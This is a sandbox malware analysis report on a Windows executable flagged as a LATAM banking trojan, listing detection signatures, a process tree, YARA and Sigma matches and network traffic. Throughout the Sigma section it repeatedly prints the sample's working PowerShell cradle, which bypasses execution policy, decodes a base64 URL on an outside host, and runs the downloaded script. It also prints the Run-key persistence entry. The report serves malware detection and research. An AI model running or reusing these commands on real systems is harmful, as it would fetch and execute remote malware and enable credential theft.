Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
87J30ulb4q.exe

Overview

General Information

Sample name:87J30ulb4q.exe
renamed because original name is a hash value
Original sample name:7c2c27aaedbc67a8e7e5c3e2e529d1a97c1b2778dbaeac037bfedaea51e0f867.exe
Analysis ID:1588179
MD5:f60ca825aa99f293f45fd16610d64a45
SHA1:2661b9d7a7801b1aa997ff3fc7c9d30aedbc4fa6
SHA256:7c2c27aaedbc67a8e7e5c3e2e529d1a97c1b2778dbaeac037bfedaea51e0f867
Tags:netbankerexelatamtrojanuser-johnk3r
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell Decrypt And Execute Base64 Data
AI detected suspicious sample
Bypasses PowerShell execution policy
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for sample
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell IEX Execution Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 87J30ulb4q.exe (PID: 5708 cmdline: "C:\Users\user\Desktop\87J30ulb4q.exe" MD5: F60CA825AA99F293F45FD16610D64A45)
    • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7224 cmdline: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • powershell.exe (PID: 7452 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7684 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7224INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x1885:$b2: ::FromBase64String(
  • 0x1962:$b2: ::FromBase64String(
  • 0x1d0fa:$b2: ::FromBase64String(
  • 0x72267:$b2: ::FromBase64String(
  • 0x766d7:$b2: ::FromBase64String(
  • 0x9b7a2:$b2: ::FromBase64String(
  • 0x13063d:$b2: ::FromBase64String(
  • 0x1484c8:$b2: ::FromBase64String(
  • 0x175d01:$b2: ::FromBase64String(
  • 0x175dde:$b2: ::FromBase64String(
  • 0x18f93a:$b2: ::FromBase64String(
  • 0x18fc5e:$b2: ::FromBase64String(
  • 0x18ff97:$b2: ::FromBase64String(
  • 0x190253:$b2: ::FromBase64String(
  • 0x190797:$b2: ::FromBase64String(
  • 0x190ffa:$b2: ::FromBase64String(
  • 0x1910e2:$b2: ::FromBase64String(
  • 0x1d6d86:$b2: ::FromBase64String(
  • 0x1d6e63:$b2: ::FromBase64String(
  • 0x1d6f40:$b2: ::FromBase64String(
  • 0x2055a9:$b2: ::FromBase64String(
Process Memory Space: powershell.exe PID: 7452INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x7abb9:$b2: ::FromBase64String(
  • 0x7acc5:$b2: ::FromBase64String(
  • 0xa80c0:$b2: ::FromBase64String(
  • 0xabb16:$b2: ::FromBase64String(
  • 0x1447a4:$b2: ::FromBase64String(
  • 0x15c022:$b2: ::FromBase64String(
  • 0x15c281:$b2: ::FromBase64String(
  • 0x15c399:$b2: ::FromBase64String(
  • 0x1850c8:$b2: ::FromBase64String(
  • 0x1851d4:$b2: ::FromBase64String(
  • 0x1852fc:$b2: ::FromBase64String(
  • 0x18540a:$b2: ::FromBase64String(
  • 0x185d9f:$b2: ::FromBase64String(
  • 0x1863cd:$b2: ::FromBase64String(
  • 0x1b21d4:$b2: ::FromBase64String(
  • 0x1eb5be:$b2: ::FromBase64String(
  • 0x1eb6d1:$b2: ::FromBase64String(
  • 0x1eb9df:$b2: ::FromBase64String(
  • 0x1ebcad:$b2: ::FromBase64String(
  • 0x21a4f9:$b2: ::FromBase64String(
  • 0x222a4e:$b2: ::FromBase64String(
Process Memory Space: powershell.exe PID: 7684INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x22965:$b2: ::FromBase64String(
  • 0x22bf6:$b2: ::FromBase64String(
  • 0x26a2a:$b2: ::FromBase64String(
  • 0x26b36:$b2: ::FromBase64String(
  • 0x27533:$b2: ::FromBase64String(
  • 0x283ed:$b2: ::FromBase64String(
  • 0x41e9c:$b2: ::FromBase64String(
  • 0x41fa8:$b2: ::FromBase64String(
  • 0x80d6a:$b2: ::FromBase64String(
  • 0xa57f9:$b2: ::FromBase64String(
  • 0xa590c:$b2: ::FromBase64String(
  • 0xa5c1a:$b2: ::FromBase64String(
  • 0xa5ee8:$b2: ::FromBase64String(
  • 0x18a255:$b2: ::FromBase64String(
  • 0x1b9217:$b2: ::FromBase64String(
  • 0x1c11ba:$b2: ::FromBase64String(
  • 0x22fac2:$b2: ::FromBase64String(
  • 0x22fbce:$b2: ::FromBase64String(
  • 0x2294b:$b3: ::UTF8.GetString(
  • 0x22bdc:$b3: ::UTF8.GetString(
  • 0x26a10:$b3: ::UTF8.GetString(

Sigma Signatures

System Summary

barindex
Sigma detected: Base64 Encoded PowerShell Command Detected
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87J30ulb4q.exe", ParentImage: C:\Users\user\Desktop\87J30ulb4q.exe, ParentProcessId: 5708, ParentProcessName: 87J30ulb4q.exe, ProcessCommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", ProcessId: 7224, ProcessName: powershell.exe
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87J30ulb4q.exe", ParentImage: C:\Users\user\Desktop\87J30ulb4q.exe, ParentProcessId: 5708, ParentProcessName: 87J30ulb4q.exe, ProcessCommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", ProcessId: 7224, ProcessName: powershell.exe
Sigma detected: PowerShell Download and Execution Cradles
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87J30ulb4q.exe", ParentImage: C:\Users\user\Desktop\87J30ulb4q.exe, ParentProcessId: 5708, ParentProcessName: 87J30ulb4q.exe, ProcessCommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", ProcessId: 7224, ProcessName: powershell.exe
Sigma detected: Suspicious PowerShell IEX Execution Patterns
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87J30ulb4q.exe", ParentImage: C:\Users\user\Desktop\87J30ulb4q.exe, ParentProcessId: 5708, ParentProcessName: 87J30ulb4q.exe, ProcessCommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", ProcessId: 7224, ProcessName: powershell.exe
Sigma detected: Suspicious PowerShell Parameter Substring
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87J30ulb4q.exe", ParentImage: C:\Users\user\Desktop\87J30ulb4q.exe, ParentProcessId: 5708, ParentProcessName: 87J30ulb4q.exe, ProcessCommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", ProcessId: 7224, ProcessName: powershell.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87J30ulb4q.exe", ParentImage: C:\Users\user\Desktop\87J30ulb4q.exe, ParentProcessId: 5708, ParentProcessName: 87J30ulb4q.exe, ProcessCommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", ProcessId: 7224, ProcessName: powershell.exe
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\87J30ulb4q.exe, ProcessId: 5708, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\jbgfag
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87J30ulb4q.exe", ParentImage: C:\Users\user\Desktop\87J30ulb4q.exe, ParentProcessId: 5708, ParentProcessName: 87J30ulb4q.exe, ProcessCommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", ProcessId: 7224, ProcessName: powershell.exe
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87J30ulb4q.exe", ParentImage: C:\Users\user\Desktop\87J30ulb4q.exe, ParentProcessId: 5708, ParentProcessName: 87J30ulb4q.exe, ProcessCommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", ProcessId: 7224, ProcessName: powershell.exe
Sigma detected: Suspicious Powershell In Registry Run Keys
Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\87J30ulb4q.exe, ProcessId: 5708, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\jbgfag
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87J30ulb4q.exe", ParentImage: C:\Users\user\Desktop\87J30ulb4q.exe, ParentProcessId: 5708, ParentProcessName: 87J30ulb4q.exe, ProcessCommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", ProcessId: 7224, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87J30ulb4q.exe", ParentImage: C:\Users\user\Desktop\87J30ulb4q.exe, ParentProcessId: 5708, ParentProcessName: 87J30ulb4q.exe, ProcessCommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", ProcessId: 7224, ProcessName: powershell.exe

Data Obfuscation

barindex
Sigma detected: Powershell Decrypt And Execute Base64 Data
Source: Process startedAuthor: Joe Security: Data: Command: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87J30ulb4q.exe", ParentImage: C:\Users\user\Desktop\87J30ulb4q.exe, ParentProcessId: 5708, ParentProcessName: 87J30ulb4q.exe, ProcessCommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", ProcessId: 7224, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: 87J30ulb4q.exeReversingLabs: Detection: 52%
Source: 87J30ulb4q.exeVirustotal: Detection: 63%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
Machine Learning detection for sample
Source: 87J30ulb4q.exeJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49788 version: TLS 1.2
Source: 87J30ulb4q.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: e.pdb source: powershell.exe, 0000000C.00000002.1558187413.00000238D0609000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb source: powershell.exe, 00000009.00000002.1455748660.000001B76ACD5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1455748660.000001B76ACD5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000009.00000002.1455748660.000001B76AD31000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000008.00000002.1307175641.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1455748660.000001B76AD24000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdby source: powershell.exe, 00000009.00000002.1455748660.000001B76ACD5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\app\assets\bin\temp-697cf367717e\obj\Release\CavnDkCvt.pdb source: 87J30ulb4q.exe
Source: Binary string: utomation.pdbA source: powershell.exe, 0000000C.00000002.1555560960.00000238D03A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dbpdbtem.pdb[ source: powershell.exe, 0000000C.00000002.1555560960.00000238D03E4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: omation.pdb! source: powershell.exe, 0000000C.00000002.1558187413.00000238D0698000.00000004.00000020.00020000.00000000.sdmp
